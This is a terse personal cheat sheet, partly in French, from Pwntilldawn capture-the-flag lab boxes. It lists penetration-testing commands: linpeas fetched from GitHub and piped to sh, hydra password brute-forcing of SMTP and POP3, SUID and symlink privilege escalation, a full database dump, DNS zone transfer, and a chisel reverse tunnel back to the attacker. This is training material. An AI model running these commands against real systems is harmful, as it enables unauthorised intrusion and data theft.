Pwntilldawn FULL

Mindmap I did while doing some Pwntilldawn boxes

Stegano

Steghide

steghide extract -sf screen.jpeg

Aperisolve

Stereogram

https://piellardj.github.io/stereogram-solver/

Depixelise

Depix

python3 depix.py -p pixel_image -s images/searchimages/image.png

Unredactor

searchsploit

searchsploit -m xxxxx

WEB

Privesc

Lien symbolique

ln -s /root /home/michael/importantfiles/rootbackup

linpeas

sudo python3 -m http.server port ( attaquant ) et wget

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

Windows

msfconsole

multi/recon/localexploitsuggester

Shell

Upgrade shell

ps --> migrate pid

sessions -u id

Metasploit

Upgrade session : sessions -u <id>

msfconsole

multi/recon/localexploitsuggester

LXC/LXD

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

Python Library Hijacking

Script qui tourne en root avec des imports de librairies

searchsploit

searchsploit xxxx

searchsploit -m chemin

SUID

find / -perm -u=s -type f 2>/dev/null

Find files

Linux

Find

find / -type f -name 'FLAG[0-9].txt' 2>/dev/null

find / \( -name ".env" -o -name ".git" \) 2>/dev/null

find ./* | grep FLAG3

find / -type f -name 'FLAG[0-9][0-9]' 2>/dev/null

Other

grep -r pattern

search in files ( -recursive )

Windows

@for /r C:\ %i in (FLAG??.txt) do @echo %i && @type "%i"

Misc

Si besoin des erreurs mais pas affichée ( ex webshell php )

Ajout de "2>fichier" apres la commande

puis faire un cat du fichier

Dumb shell upgrade

script /dev/null -qc /bin/bash

python3 -c 'import pty; pty.spawn("/bin/bash")'

python -c 'import pty; pty.spawn("/bin/bash")'

netstat -antup

Protocoles divers

SMTP

smtp-user-enum -U /usr/share/wordlists/metasploit/unix_users.txt 10.150.150.17 25

hydra -l operator -P wordlist.txt ipip smtp

NFS

rpcinfo IP

sudo umount 10.150.150.59:/nfsroot

sudo mount -t nfs ip:/remote /local

showmount -e IP

FTP

Mysql

mysqldump -u root -p --all-databases > alldb.sql

mysql -h localhost -u sql_user -p

POP3

hydra -l operator -P wordlist.txt ip pop3

SSH

Connexion si on a la clé privée

ssh -i id_rsa user@ip

Test de se co pour la bannière

DNS

Ajout dans /etc/hosts si besoin

Exemple :
10.150.150.57 rickscontrolpanel.mortysserver.com

! AXFR !

dig @mortysserver.com mortysserver.com axfr

NMAP

sudo nmap -sF -p1-100 -T4

nmap -sV -Pn -p- -T5 ip

nmap -sV -sC -T5 -p- ip

Nmap Automator

Pivoting / Tunneling

Verifier ce qui écoute sur localhost

netstat -antup

Tunneling & Port Forwarding

Web en écoute sur localhost

Sur l'host

chisel server -port 7777 --reverse

Subtopic

Sur la victime

./chisel client ip_host:7777 R:8080:127.0.0.1:8080

Ne pas oublier d'adapter le port 8080 selon les situations

Si on a un acces SSH

sshuttle -r user@ip -N